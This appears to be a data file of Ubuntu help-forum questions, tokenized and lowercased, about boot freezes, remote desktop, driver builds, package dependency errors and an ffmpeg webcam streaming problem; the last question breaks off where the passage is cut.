234849	'power nap ' in ubuntu as in macbooks	there is a 'power- nap ' feature on new mackbooks which keeps all the activity going even when the lid is closed. ( eg . downloading email , backing up , syncing ) is there any such feature on ubuntu ?
234851	ubuntu keeps freezing but mouse still moves	ok so my ubuntu lenovo idea center keeps freezing ... when i boot it up it freezes at random times but the mouse still moves . i have to hard boot it to make it stop . i do n't want to have to hardboot anymore ! i have 512 mb of ram and my graphics card is unknown 993.6 mib of memory and intel® atom™ cpu d410 @ 1.66ghz × 2 is my prossecer .
234856	unable to do remote desktop using xrdp	i have a virtual machine ( ubuntu ) to which i need to do remote desktop . i do not have physical access to that machine and i can do only ssh to the machine . i wanted to do remote desktop and came up with lot of options ( vnc , xrdp , opennx ) . i used xrdp and i installed the necessary packages in the ubuntu machine ( xrdp and dependent ) . then i enabled the remote access in the ubuntu using the following command line option . gconftool-2 -s -t bool /desktop/gnome/remote_access/enabled true gconftool-2 -s -t bool /desktop/gnome/remote_access/prompt_enabled false then i restarted the xrdp ( /etc/init.d/xrdp start ) . but when i try to do rdp using the windows client ( mstsc ) , i get the following error . remote access to the server is not enabled . how do i solve this . kindly help . raj
234859	upgrading ubuntu 11.04 to 12.04 while having windows 7	i have ubuntu 11.04 & windows 7 dual-booting on my laptop and i want to upgrade to ubuntu 12.04 . i 'd like to know whether this upgrade will damage my windows partition . is it safe to do so and will everything still work correctly afterwards ?
234864	how do i prevent my screen from freezing after booting successfully on acer aspire 5520g laptop ?	i own an acer aspire 5520g and just installed ubuntu 12.10 alongside win7 ultimate . both are 32bit . i am able to boot into either via grub . however , i am facing two problems : the computer often freezes after booting up successsfuly into ubuntu . the desktop appears and i can move the mouse , but the buttons on the mouse will not work . sometimes i ca n't even move the mouse . the wireless adapter is detected , but i am unable to add a wireless network and put in a passkey . i 'd be very grateful for any help .
234866	how can i update adobe flash player when adobe doesnt support linux anymore ?	im trying to update my adobe to be able to be able to play games , watch youtube etc etc .
234871	youtube says `` this video is currently unavailable ''	chromium on ubuntu 12.04 . youtube says : this video is currently unavailable i do n't know why but this is the case for some videos , but not all . well , most videos . and i do n't know what 's wrong . anyone help ?
234877	how do i install minecraft on ubuntu 12.10 ?	i just recently dual booted windows 8 and ubuntu 12.10 on my gaming desktop . i have not installed java yet as i have tried and failed miserably . so can you help ? please ? i just want to play some minecraft .
234878	firefox running very slow ; microphone does not work with skype	hi i just installed ubuntu 12.04 and firefox is running very slow . the firefox version is 17.0.1 . another problem i have is that my external microphone is not working on skype . so how can i fix these problems ? regards , kolyo
234879	make cairo dock update like launcher does	is there anyway to make the cairo dock mirror the launcher ? such as showing programs when they 're open ?
234882	youtube plays videos at 360p ( `` auto '' does n't work )	i have moved to ubuntu recently and noticed a bug i 've never met in windows . youtube 's `` auto '' video quality option does not work there - the videos are always played at 360p , so i should to choose 720 manually for each video . how to fix that ? chrome , ubuntu 12.04 , bandwidth enough for 720p
234883	i can not access the bios after installing ubuntu on sony vaio e11 with windows 8	i have a sony vaio e11 series laptop with windows 8 . i went to install ubuntu from a bootable usb after wiping windows 8 . i went to restart the laptop and i get a message saying error : unknown file system . grub rescue to make matters worse the usb does n't boot when i turn the laptop on and i have no way to access the bios .
234888	ubuntu installation fails from cd and usb stick	i am trying to install ubuntu 12.10 . i have downloaded the .iso file . i tried to burn the file to a dvd using infra recorder but it gives an input/output error . then it fails to burn and cd drive ejects the cd . i tried using usb stick too . but after pressing the create button , it gives an error : can not open file as archive .
234896	ubuntu - slow image viewer	i have dell precision with i7 and nvidia quadro 2000m . i have many 12mp ( 5mb jpeg ) images from my camera . image viewer on ubuntu needs 2-3 seconds to show next image . windows 7 does the same in no-time , ps3 also , even my ipad is incredibly fast ... is is possible to do something in order to improve performance ? maybe it 's possible to enable hardware acceleration ?
234897	safely remove linux partition and grub from windows	how do i safely remove ubuntu partition from windows ? i messed up with ubuntu update ; now the desktop is empty , no launchbar and no sidebar , although all the files are there and the terminal is working . i 'd like to delete the linux partion and start a new ubuntu .
234900	upgrading 11.10 gives : libcurl3-gnutls , libp11-kit0 - dependency error	when i do upgrade or install , im getting this error . srikanth @ btp8sa42 : ~/projects/raff $ sudo apt-get upgrade [ sudo ] password for srikanth : reading package lists ... done building dependency tree reading state information ... done you might want to run 'apt-get -f install ' to correct these . the following packages have unmet dependencies : libcurl3-gnutls : depends : libc6 ( > = 2.15 ) but 2.13-20ubuntu5.3 is installed depends : libgnutls26 ( > = 2.12.6.1-0 ) but 2.10.5-1ubuntu3.2 is installed depends : libgssapi-krb5-2 ( > = 1.10+dfsg~ ) but 1.9.1+dfsg-1ubuntu2.3 is installed libp11-kit0 : depends : libc6 ( > = 2.14 ) but 2.13-20ubuntu5.3 is installed e : unmet dependencies . try using -f. when i do `` apt-get -f install '' srikanth @ btp8sa42 : ~/projects/raff $ sudo apt-get -f install reading package lists ... done building dependency tree reading state information ... done correcting dependencies ... failed . the following packages have unmet dependencies : libcurl3-gnutls : depends : libc6 ( > = 2.15 ) but 2.13-20ubuntu5.3 is installed depends : libgnutls26 ( > = 2.12.6.1-0 ) but 2.10.5-1ubuntu3.2 is installed depends : libgssapi-krb5-2 ( > = 1.10+dfsg~ ) but 1.9.1+dfsg-1ubuntu2.3 is installed libp11-kit0 : depends : libc6 ( > = 2.14 ) but 2.13-20ubuntu5.3 is installed e : error , pkgproblemresolver : :resolve generated breaks , this may be caused by held packages . e : unable to correct dependencies how can i fix this ?
234906	ubuntu 12.04 - [ drm ] nouveau unknown i2c port , i can not use the pci express card with vga and hdmi output	i have this brand new pci-express cards ( bought 10 of them geforce-gt-620 ) . where i am using 12.04 64-bit , and trying to use vga + hdmi outputs from that card . but ubuntu is throwing this nonstop . [ 32323233 ] [ drm ] nouveau [ 0000:01:00.0 ] : unknown i2c port 48 [ 32323233 ] [ drm ] nouveau [ 0000:01:00.0 ] : unknown i2c port 57 [ 32323233 ] [ drm ] nouveau [ 0000:01:00.0 ] : unknown i2c port 48 [ 32323233 ] [ drm ] nouveau [ 0000:01:00.0 ] : unknown i2c port 57 but i tried 12.10 same card seems to work there . how can i make the same card work under 12.04 ? ( because on 12.10 i have some serious dependencies problem , can not use 12.10 as of this moment for those cards ) i have tried : $ download kernel latest install it $ download http : //kernel.ubuntu.com/~kernel-ppa/mainline/v3.5.1-quantal/ $ sudo dpkg -i linux*.deb $ dpkg -- list | grep linux-image ii linux-image-3.2.0-29-generic 3.2.0-29.46 linux kernel image for version 3.2.0 on 64 bit x86 smp ii linux-image-3.2.0-35-generic 3.2.0-35.55 linux kernel image for version 3.2.0 on 64 bit x86 smp ii linux-image-3.5.1-030501-generic 3.5.1-030501.201208091310 linux kernel image for version 3.5.1 on 64 bit x86 smp ii linux-image-3.6.0-030600rc3-generic 3.6.0-030600rc3.201208221735 linux kernel image for version 3.6.0 on 64 bit x86 smp ii linux-image-extra-3.5.1-030501-generic 3.5.1-030501.201208091310 linux kernel image for version 3.5.1 on 64 bit x86 smp ii linux-image-extra-3.6.0-030600rc3-generic 3.6.0-030600rc3.201208221735 linux kernel image for version 3.6.0 on 64 bit x86 smp ii linux-image-generic 3.2.0.35.40 generic linux kernel image $ apt-get purge linux-image-3.6.0-030600rc3-generic # did not solve the problem $ update-grub2 $ init 6 $ uname -a linux sun-alienware-x51 3.5.1-030501-generic # 201208091310 smp thu aug 9 17:11:48 utc 2012 x86_64 x86_64 x86_64 gnu/linux $ sudo apt-get remove -- purge nvidia-current $ sudo apt-get install nvidia-current $ sudo nvidia-xconfig after reboot i can see hdmi output i have display but the vga is not showing anything at all .
234909	error during `` make install '' while installing player	i want to install player on ubuntu platform . 1 ) i give `` configure '' . this is done successfully . 2 ) after giving `` sudo make install '' , i get the following error : making install in replace make [ 1 ] : entering directory `/home/khimya/player-2.1.2/replace' if /bin/bash ../libtool -- tag=cc -- mode=compile gcc -dhave_config_h -i . -i . -i.. -i../libplayercore -i../client_libs/libplayerc++ -i../client_libs/libplayerc -g -o2 -mt poll.lo -md -mp -mf `` .deps/poll.tpo '' -c -o poll.lo poll.c ; \ then mv -f `` .deps/poll.tpo '' `` .deps/poll.plo '' ; else rm -f `` .deps/poll.tpo '' ; exit 1 ; fi gcc -dhave_config_h -i . -i . -i.. -i../libplayercore -i../client_libs/libplayerc++ -i../client_libs/libplayerc -g -o2 -mt poll.lo -md -mp -mf .deps/poll.tpo -c poll.c -fpic -dpic -o .libs/poll.o in file included from poll.c:26 : replace.h:100 : warning : ‘struct timespec’ declared inside parameter list replace.h:100 : warning : its scope is only this definition or declaration , which is probably not what you want in **file included from poll.c:34 : **/usr/include/unistd.h:275 : error : two or more data types in declaration specifiers** poll.c : in function ‘poll’ : ** poll.c:79 : warning : incompatible implicit declaration of built-in function ‘alloca’ make [ 1 ] : *** [ poll.lo ] error 1 could anyone please tell what could be done precisely . make [ 1 ] : leaving directory `/home/khimya/player-2.1.2/replace' make : *** [ install-recursive ] error 1
234911	failed to install ubuntu 12.10 on oracle vm virtualbox	virtual computer setup : 512 mb ram laptop spec : i3 2.1ghz 2gb ddr3 ram nvidia gt525m i am install ubuntu successfully just now , but the vm crash once it needed to be reboot . what can i do now ?
234913	why is disk usage greater than the size of all files on it ?	i have a 3tb hdd . in the properties screen of the hdd , it says that i have used 471.4gb , but when i select all the files in nautilus , it says that 321.0gb is selected . if i only have 321.0gb of files in the hdd , why is it using 471.4gb ? the hdd 's partitioning is using guid and file system being used in ext4 . when i select the hdd using disk utility app , i get a warning saying : warning : the partition is misaligned by 3072 bytes . this may result in very poor performance . repartitioning is suggested . has that got anything to do with the missing 150.4gb ?
234916	error when trying to compile broadcom-sta driver	i was updated my ubuntu 12.04.1 lts kernel to version 3.5.0-18-generic so i need to recompile my broadcom-sta to work with the new kernel i was run ubuntu @ ubuntu : ~ $ sudo dpkg-reconfigure broadcom-sta-dkms -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- deleting module version : 5.100.82.112 completely from the dkms tree . -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- done . loading new broadcom-sta-5.100.82.112 dkms files ... building only for 3.5.0-18-generic building initial module for 3.5.0-18-generic error ( dkms apport ) : kernel package linux-headers-3.5.0-18-generic is not supported error ! bad return status for module build on kernel : 3.5.0-18-generic ( i686 ) consult /var/lib/dkms/broadcom-sta/5.100.82.112/build/make.log for more information . and here is the log file ubuntu @ ubuntu : ~ $ cat /var/lib/dkms/broadcom-sta/5.100.82.112/build/make.log dkms make.log for broadcom-sta-5.100.82.112 for kernel 3.5.0-18-generic ( i686 ) tue jan 1 19:30:03 ict 2013 make : entering directory `/usr/src/linux-headers-3.5.0-18-generic' wireless extension is the only possible api for this kernel version using wireless extension api kernel architecture is x86_32 ld /var/lib/dkms/broadcom-sta/5.100.82.112/build/built-in.o cc [ m ] /var/lib/dkms/broadcom-sta/5.100.82.112/build/src/shared/linux_osl.o /bin/sh : 1 : /usr/src/linux-headers-3.5.0-18-generic/scripts/recordmcount : permission denied make [ 1 ] : *** [ /var/lib/dkms/broadcom-sta/5.100.82.112/build/src/shared/linux_osl.o ] error 126 make : *** [ _module_/var/lib/dkms/broadcom-sta/5.100.82.112/build ] error 2 make : leaving directory `/usr/src/linux-headers-3.5.0-18-generic' how can i fix this . i really need it
234917	can i input chinese in my xterm ?	i have chinese input working . i have xterm working . i have utf-8 working in my xterm . for example , i can see the lightning bolt unicode character . but when i input chinese characters , i get those blocks . whats up with that ? here is what i 'm doing in my .xresources : xterm*facename : monospace:9 xterm*boldfont : monospace:9 xterm*facenamedoublesize : monospace:9 also , i 'm using ibus to input chinese .
234921	ca n't boot after successful installation of 12.04	right now i 'm on ubuntu 12.10 x64 liveusb . i tried to install it twice but even the installation went successful , it just got stuck on the booting screen with blinking _ maybe the grub is problem ? i tried to install this app via terminal , but i got this error : valueerror : bad marshal data ( unknown type code )
234922	setup openssh-hpn in ubuntu 12.10	i have setup openssh in in ubuntu12.10 . the version it shows openssh_6.0p1 debian-3ubuntu1 , openssl 1.0.1c 10 may 2012 does this version contain openssh-hpn or do i have it install is separately . if so can some please tell me how to do it thanks
234923	not able to update ubuntu 12.10	while updating my ubuntu 12.10 am getting the following error . could anyone help ! w : failed to fetch http : //dl.google.com/linux/chrome/deb/dists/stable/main/binary-i386/packages 403 forbidden [ ip : 74.125.31.91 80 ] , w : failed to fetch http : //dl.google.com/linux/talkplugin/deb/dists/stable/main/binary-i386/packages 403 forbidden [ ip : 74.125.31.91 80 ]
234927	fastest way to backup a single file ?	i want to quickly create a backup of a file , by creating a duplicate with a '~ ' at the end , in terminal . is there any straight forward single command way of doing this ?
234930	choose lightdm login screen location in multi monitor setup	how can i set the location for the login screen with lightdm in a multi monitor setup . if have two monitors ( 1920x1080 ) + ( 1920x1200 ) and currently after i boot the login is shown on the left ( smaller ) monitor . i would like to view it only on the right ( bigger ) monitor . switching the cables on the graphics card did not help , and i have already made the bigger screen my primary screen using xrandr : xrandr -- output dvi-1 -- primary # big screen after login my panel is on the primary screen but the login screen itself is shown on the other smaller screen . how can i configure lightdm to display the login only on the bigger screen .
234932	wired network cuts out periodically	lspci output : 04:00.0 ethernet controller : marvell technology group ltd. 88e8053 pci-e gigabit ethernet controller ( rev 22 ) syslog : http : //paste.ubuntu.com/1485305/ it gets a pci hardware error ( 0x2010 ) warning : at /build/buildd/linux-3.5.0/net/sched/sch_generic.c:255 dev_watchdog+0x24a/0x260 ( ) then it tries to bring the connection up from there on until a reboot , failing after a few seconds and dropping it again . $ uname -a linux helms-deep 3.5.0-21-generic # 32-ubuntu smp tue dec 11 18:51:59 utc 2012 x86_64 x86_64 x86_64 gnu/linux
234933	how do i batch delete a specific file inside multiple rar archives ?	i have about 1000 rar files , that randomly contains an exe file named : '' jpg-crack.exe '' . i need to delete it from all archives without harming the other archive content . thanks
234934	./configure error when compiling xgrafix on ubuntu 12.04	i have ubuntu 32 bit on i7 processor . i tried to compile and install this package called xgrafix , i have installed dependencies , but now it has error as following . samir @ samir-hp : ~/downloads/xgrafix $ ./configure -- with-x11_libdir /usr/lib/i386-linux-gnu/ configure : warning : you should use -- build , -- host , -- target configure : warning : invalid host type : /usr/lib/i386-linux-gnu/ checking for a bsd-compatible install ... /usr/bin/install -c checking whether build environment is sane ... yes checking for a thread-safe mkdir -p ... /bin/mkdir -p checking for gawk ... no checking for mawk ... mawk checking whether make sets $ ( make ) ... yes checking whether to enable maintainer-specific portions of makefiles ... no checking build system type ... invalid configuration `/usr/lib/i386-linux-gnu/ ' : machine `/usr/lib/i386 ' not recognized configure : error : /bin/bash ./config/config.sub /usr/lib/i386-linux-gnu/ failed i have tried several thing but was unable to resolve this .
234937	move os to another computer	is it possible to install latest xubuntu x64 ( generic kernel ) to the hdd on one computer and then move this hdd to another computer ? will it break something ? is there any pitfalls i should know about ?
234938	best video editor for joining & cutting .mpg	what is the best video editor for joining & cutting .mpg on precise ? for example , joining .mpg files for joining first half & second half of a film , and for cutting out adverts ?
234939	no wireless on dell inspiron n4050 : take three	i already asked about this twice before and did n't get any help , so here goes take three . i bought this machine both because it was a great deal on a switchable-graphics machine , and because it had ubuntu preinstalled . so here goes the story in detail . when i first unboxed and powered on the machine , wireless worked out of the box in the preinstalled ubuntu 10.10 . then i started upgrading and updating stuff , with the intention of taking the long way around up to 12.04 lts or 12.10 - whichever worked . in the process , i did something stupid : i installed the broadcom proprietary wireless driver suggested by the additional drivers module , and wireless stopped working altogether ! i struggled with finding a fix for a few days , and then out of sheer and utter frustration , i went out and bought me a copy of windows 7 professional 64-bit and ran that . natch , everything worked flawlessly , including wireless . last week , i then decided to try again . so i set aside a windows disk image and tried a fresh installation 10.10 and then 11.04 , 11.10 , 12.04 and 12.10 , but had no success getting wireless to work on any of them . so i put the windows disk image back in and ran the machine with no issue this week . then last night i decided to try yet again , so i tried out another fresh installation of 10.10 and then 12.04 . i got as far as resolving the `` fatal '' issue with the windows drivers module , but even installing the windows driver does n't resolve the wireless issue - i still get the message `` hardware present : no . '' but when i run the lspci command in terminal , is does list out the broadcom network device as : 09:00.0 network controller : broadcom corporation device 4365 ( rev 01 ) i 'm sorry for the lengthy post and repeated question , but i really wanted ( and still want ) to like linux and ubuntu and wean myself off of microsoft , but this sort of trouble does n't help . so , i need your help , ladies and gents . thanks in advance !
234941	`` can not create directory `java ' : permission denied `` how to solve this issue ?	can anybody help me in solving this issue . i am new to linux and here 's problem : gourab @ gourab-rv509 : /usr/share/java $ cd / gourab @ gourab-rv509 : / $ cd usr gourab @ gourab-rv509 : /usr $ mkdir java mkdir : can not create directory `java ' : permission denied gourab @ gourab-rv509 : /usr $
234946	micro sd card automatically getting write protected	i 'm using transcend micro sd card . when i try to copy some files from my system ( 12.04 ) , it 's getting write protected and also unmounting the device . i 'm unable to copy files to it .
234950	how do i install ubuntu without losing data ?	i have windows 7 currently installed on my c : drive , which is the only available drive . i want to insall ubuntu 12.10 withour deleting windows 7 or any of my data . do i need to partition my drive ? out of 320gb space i have only 48 gb free space on c : drive , and i do n't want to lose any data . also , will there be issues with drivers if have both windows and ubuntu ?
234952	do i need to compile intel graphics drivers on ubuntu ? and if so , how ?	is there is a prepackaged version or pre-compiled package of intel 's graphic drivers ? i have an intel gma 3150 graphics adapter . one option is compiling from source , from the http : //intellinuxgraphics.com website , but i do n't know how to compile .
234956	xubuntu 12.10 and ffmpeg webcam	having a problem running ffmpeg to an ffserver in a brand new install of xubuntu 12.10 . i just installed xubuntu 12.10 from scratch , then installed ffmpeg . i plugged in my webcam ( mind you i have used this webcam on another system ubuntu 12.04 and 11.04 without any problems using the same ffserver and same command ) then ran the ffmpeg command : ffmpeg -f video4linux2 -i /dev/video0 http : //ip:8090/cam1.ffm now in theory that should work but what i get is : fmpeg version 0.8.4-6:0.8.4-0ubuntu0.12.10.1 , copyright ( c ) 2000-2012 the libav developers built on nov 6 2012 16:49:20 with gcc 4.7.2 *** this program is deprecated *** this program is only provided for compatibility and will be removed in a future release . please use avconv instead . ffmpeg : /build/buildd/libav-0.8.4/libavutil/mathematics.c:79 : av_rescale_rnd : assertion `c > 0 ' failed . aborted ( core dumped ) i have searched that error and can not find it anywhere . so i tried mplayer to see if the webcam was working and if video0 was working : mplayer tv : // -tv device=/dev/video0 : driver=v4l2 : width=352 : height=288 that works perfectly and shows me my webcam screen . now i thought , ok maybe this stupid deprecation thing has something to do with it , so i tried the exact same command for ffmpeg using avconv and i get the same error . lsusb gives me : bus 001 device 003 : id 04fc:1528 sunplus technology co. , ltd spca1527a/spca1528 sd card camera ( webcam mode ) as i said , i have this exact same webcam working on two other pc 's with two different ubuntu installs . edit : i 've recompiled ffmpeg using these instructions : https : //ffmpeg.org/trac/ffmpeg/wiki/ubuntucompilationguide it works , if i just use the same command as above it runs , cpu runs at 100 % as if it was converting . but no output in ffmpeg , it just hangs here indefinitely until i ctrl-c : ffmpeg version git-2013-01-01-fde1305 copyright ( c ) 2000-2013 the ffmpeg developers built on jan 1 2013 11:42:21 with gcc 4.7 ( ubuntu/linaro 4.7.2-2ubuntu1 ) configuration : -- enable-gpl -- enable-libass -- enable-libfaac -- enable-libfdk-aac -- enable-libmp3lame -- enable-libopencore-amrnb -- enable-libopencore-amrwb -- enable-librtmp -- enable-libtheora -- enable-libvorbis -- enable-libvpx -- enable-x11grab -- enable-libx264 -- enable-nonfree -- enable-version3 libavutil 52 . 13.100 / 52 . 13.100 libavcodec 54 . 85.100 / 54 . 85.100 libavformat 54 . 58.102 / 54 . 58.102 libavdevice 54 . 3.102 / 54 . 3.102 libavfilter 3 . 30.102 / 3 . 30.102 libswscale 2 . 1.103 / 2 . 1.103 libswresample 0 . 17.102 / 0 . 17.102 libpostproc 52 . 2.100 / 52 . 2.100 [ video4linux2 , v4l2 @ 0x97c8200 ] dts discontinuity in stream 0 : packet 3 with dts 21527529506 , packet 4 with dts 21527577460 then once i ctrl-c twice i get this : ^cestimating duration from bitrate , this may be inaccurate input # 0 , video4linux2 , v4l2 , from '/dev/video0 ' : duration : n/a , start : 21527.513483 , bitrate : n/a stream # 0:0 : video : mjpeg , yuvj420p , 320x240 , -2147483 kb/s , 18.08 tbr , 1000k tbn , 1000k tbc http : //ip:8090/cam1.ffm : input/output error received signal 2 : terminating . ok , let me see if i specify framerate what happens : ffmpeg -r 2 -f video4linux2 -i /dev/video0 http : //ip:8090/cam1.ffm ffmpeg version git-2013-01-01-fde1305 copyright ( c ) 2000-2013 the ffmpeg developers built on jan 1 2013 11:42:21 with gcc 4.7 ( ubuntu/linaro 4.7.2-2ubuntu1 ) configuration : -- enable-gpl -- enable-libass -- enable-libfaac -- enable-libfdk-aac -- enable-libmp3lame -- enable-libopencore-amrnb -- enable-libopencore-amrwb -- enable-librtmp -- enable-libtheora -- enable-libvorbis -- enable-libvpx -- enable-x11grab -- enable-libx264 -- enable-nonfree -- enable-version3 libavutil 52 . 13.100 / 52 . 13.100 libavcodec 54 . 85.100 / 54 . 85.100 libavformat 54 . 58.102 / 54 . 58.102 libavdevice 54 . 3.102 / 54 . 3.102 libavfilter 3 . 30.102 / 3 . 30.102 libswscale 2 . 1.103 / 2 . 1.103 libswresample 0 . 17.102 / 0 . 17.102 libpostproc 52 . 2.100 / 52 . 2.100 [ video4linux2 , v4l2 @ 0xa5fa2a0 ] dts discontinuity in stream 0 : packet 3 with dts 21627329870 , packet 4 with dts 21627409821 [ video4linux2 , v4l2 @ 0xa5fa2a0 ] max_analyze_duration 5000000 reached at 5000000 [ video4linux2 , v4l2 @ 0xa5fa2a0 ] estimating duration from bitrate , this may be inaccurate input # 0 , video4linux2 , v4l2 , from '/dev/video0 ' : duration : n/a , start : 21627.313851 , bitrate : n/a stream # 0:0 : video : mjpeg , yuvj420p , 320x240 , 0 kb/s , 2 fps , 0.25 tbr , 1000k tbn , 2 tbc incompatible pixel format ' ( null ) ' for codec 'flv ' , auto-selecting format ' ( null ) ' last message repeated 1 times [ flv @ 0xa6046c0 ] specified pixel format yuvj420p is invalid or not supported output # 0 , ffm , to 'http : //198.144.186.224:8090/cam1.ffm ' : metadata : creation_time : now stream # 0:0 : video : flv1 ( [ 0 ] [ 0 ] [ 0 ] [ 5 ] / 0x5000000 ) , yuvj420p , 320x2 , q=255-255 , 200 kb/s , 1000k tbn , 2 tbc stream mapping : stream # 0:0 - > # 0:0 ( mjpeg - > flv ) error while opening encoder for output stream # 0:0 - maybe incorrect parameters such as bit_rate , rate , width or height my ffserver conf file looks like this ( even though as i said it was working before from another pc ) : port 8090 bindaddress ip maxhttpconnections 30 maxclients 20 maxbandwidth 2000 customlog - < feed cam1.ffm > file /tmp/cam1.ffm filemaxsize 10000k < /feed > < stream cam1.flv > feed cam1.ffm format flv videocodec flv videoframerate 2 videobuffersize 20000 videobitrate 200 videoqmin 5 videoqmax 10 videosize qvga preroll 0 noaudio avoptionvideo flags +global_header < /stream > < stream stat.html > format status < /stream > edit 2 : just confirmed that running it on my ubuntu 11.04 machine it works just fine , the command is a bit different but it works : ffmpeg -r 10 -s 320x240 -f video4linux2 -aspect 4:3 -i /dev/video0 http : //ip:8090/cam1.ffm so i copied this command into the other xubuntu system and i get the missing yuvj420p problem from before : [ video4linux2 , v4l2 @ 0xb1c53e0 ] estimating duration from bitrate , this may be inaccurate input # 0 , video4linux2 , v4l2 , from '/dev/video0 ' : duration : n/a , start : 27867.321194 , bitrate : n/a stream # 0:0 : video : mjpeg , yuvj420p , 320x240 , -1 kb/s , 10 tbr , 1000k tbn , 10 tbc incompatible pixel format ' ( null ) ' for codec 'flv ' , auto-selecting format ' ( null ) ' last message repeated 1 times [ flv @ 0xb1ca6e0 ] specified pixel format yuvj420p is invalid or not supported output # 0 , ffm , to 'http : //198.144.186.224:8090/cam1.ffm ' : metadata : creation_time : now stream # 0:0 : video : flv1 ( [ 0 ] [ 0 ] [ 0 ] [ 5 ] / 0x5000000 ) , yuvj420p , 320x10 , q=255-255 , 200 kb/s , 1000k tbn , 10 tbc stream mapping : stream # 0:0 - > # 0:0 ( mjpeg - > flv ) error while opening encoder for output stream # 0:0 - maybe incorrect parameters such as bit_rate , rate , width or height above is posted the config information when i run ffmpeg on my xubuntu machine , here is what is displayed when i run ffmpeg on my ubuntu 11 machine : ffmpeg version 0.6.6-4:0.6.6-0ubuntu0.11.04.1 , copyright ( c ) 2000-2010 the libav developers built on jun 12 2012 16:28:21 with gcc 4.5.2 configuration : -- extra-version=4:0.6.6-0ubuntu0.11.04.1 -- prefix=/usr -- enable-avfilter -- enable-avfilter-lavf -- enable-vdpau -- enable-bzlib -- enable-libgsm -- enable-libschroedinger -- enable-libspeex -- enable-libtheora -- enable-libvorbis -- enable-pthreads -- enable-zlib -- enable-libvpx -- disable-stripping -- enable-runtime-cpudetect -- enable-vaapi -- enable-gpl -- enable-postproc -- enable-swscale -- enable-x11grab -- enable-libdc1394 -- enable-shared -- disable-static warning : library configuration mismatch libavutil configuration : -- extra-version=4:0.6.6-1ubuntu1 -- prefix=/usr -- enable-avfilter -- enable-avfilter-lavf -- enable-vdpau -- enable-bzlib -- enable-libdirac -- enable-libgsm -- enable-libopenjpeg -- enable-libschroedinger -- enable-libspeex -- enable-libtheora -- enable-libvorbis -- enable-pthreads -- enable-zlib -- enable-libvpx -- disable-stripping -- enable-runtime-cpudetect -- enable-vaapi -- enable-libopenjpeg -- enable-gpl -- enable-postproc -- enable-swscale -- enable-x11grab -- enable-libfaad -- enable-libdirac -- enable-libfaad -- enable-libmp3lame -- enable-librtmp -- enable-libx264 -- enable-libxvid -- enable-libdc1394 -- shlibdir=/usr/lib/i686/cmov -- cpu=i686 -- enable-shared -- disable-static -- disable-ffmpeg -- disable-ffplay libavcodec configuration : -- extra-version=4:0.6.6-1ubuntu1 -- prefix=/usr -- enable-avfilter -- enable-avfilter-lavf -- enable-vdpau -- enable-bzlib -- enable-libdirac -- enable-libgsm -- enable-libopenjpeg -- enable-libschroedinger -- enable-libspeex -- enable-libtheora -- enable-libvorbis -- enable-pthreads -- enable-zlib -- enable-libvpx -- disable-stripping -- enable-runtime-cpudetect -- enable-vaapi -- enable-libopenjpeg -- enable-gpl -- enable-postproc -- enable-swscale -- enable-x11grab -- enable-libfaad -- enable-libdirac -- enable-libfaad -- enable-libmp3lame -- enable-librtmp -- enable-libx264 -- enable-libxvid -- enable-libdc1394 -- shlibdir=/usr/lib/i686/cmov -- cpu=i686 -- enable-shared -- disable-static -- disable-ffmpeg -- disable-ffplay libavformat configuration : -- extra-version=4:0.6.6-0ubuntu0.11.04.1 -- prefix=/usr -- enable-avfilter -- enable-avfilter-lavf -- enable-vdpau -- enable-bzlib -- enable-libgsm -- enable-libschroedinger -- enable-libspeex -- enable-libtheora -- enable-libvorbis -- enable-pthreads -- enable-zlib -- enable-libvpx -- disable-stripping -- enable-runtime-cpudetect -- enable-vaapi -- enable-gpl -- enable-postproc -- enable-swscale -- enable-x11grab -- enable-libdc1394 -- shlibdir=/usr/lib/i686/cmov -- cpu=i686 -- enable-shared -- disable-static -- disable-ffmpeg -- disable-ffplay libavdevice configuration : -- extra-version=4:0.6.6-0ubuntu0.11.04.1 -- prefix=/usr -- enable-avfilter -- enable-avfilter-lavf -- enable-vdpau -- enable-bzlib -- enable-libgsm -- enable-libschroedinger -- enable-libspeex -- enable-libtheora -- enable-libvorbis -- enable-pthreads -- enable-zlib -- enable-libvpx -- disable-stripping -- enable-runtime-cpudetect -- enable-vaapi -- enable-gpl -- enable-postproc -- enable-swscale -- enable-x11grab -- enable-libdc1394 -- shlibdir=/usr/lib/i686/cmov -- cpu=i686 -- enable-shared -- disable-static -- disable-ffmpeg -- disable-ffplay libavfilter configuration : -- extra-version=4:0.6.6-0ubuntu0.11.04.1 -- prefix=/usr -- enable-avfilter -- enable-avfilter-lavf -- enable-vdpau -- enable-bzlib -- enable-libgsm -- enable-libschroedinger -- enable-libspeex -- enable-libtheora -- enable-libvorbis -- enable-pthreads -- enable-zlib -- enable-libvpx -- disable-stripping -- enable-runtime-cpudetect -- enable-vaapi -- enable-gpl -- enable-postproc -- enable-swscale -- enable-x11grab -- enable-libdc1394 -- shlibdir=/usr/lib/i686/cmov -- cpu=i686 -- enable-shared -- disable-static -- disable-ffmpeg -- disable-ffplay libswscale configuration : -- extra-version=4:0.6.6-0ubuntu0.11.04.1 -- prefix=/usr -- enable-avfilter -- enable-avfilter-lavf -- enable-vdpau -- enable-bzlib -- enable-libgsm -- enable-libschroedinger -- enable-libspeex -- enable-libtheora -- enable-libvorbis -- enable-pthreads -- enable-zlib -- enable-libvpx -- disable-stripping -- enable-runtime-cpudetect -- enable-vaapi -- enable-gpl -- enable-postproc -- enable-swscale -- enable-x11grab -- enable-libdc1394 -- shlibdir=/usr/lib/i686/cmov -- cpu=i686 -- enable-shared -- disable-static -- disable-ffmpeg -- disable-ffplay libpostproc configuration : -- extra-version=4:0.6.6-0ubuntu0.11.04.1 -- prefix=/usr -- enable-avfilter -- enable-avfilter-lavf -- enable-vdpau -- enable-bzlib -- enable-libgsm -- enable-libschroedinger -- enable-libspeex -- enable-libtheora -- enable-libvorbis -- enable-pthreads -- enable-zlib -- enable-libvpx -- disable-stripping -- enable-runtime-cpudetect -- enable-vaapi -- enable-gpl -- enable-postproc -- enable-swscale -- enable-x11grab -- enable-libdc1394 -- shlibdir=/usr/lib/i686/cmov -- cpu=i686 -- enable-shared -- disable-static -- disable-ffmpeg -- disable-ffplay libavutil 50.15 . 1 / 50.15 . 1 libavcodec 52.72 . 2 / 52.72 . 2 libavformat 52.64 . 2 / 52.64 . 2 libavdevice 52 . 2 . 0 / 52 . 2 . 0 libavfilter 1.19 . 0 / 1.19 . 0 libswscale 0.11 . 0 / 0.11 . 0 libpostproc 51 . 2 . 0 / 51 . 2 . 0 so of course it 's compiled with different options , but which option is the one that supports yuvj420p or how do i get the error for that to go away now that i know what the problem 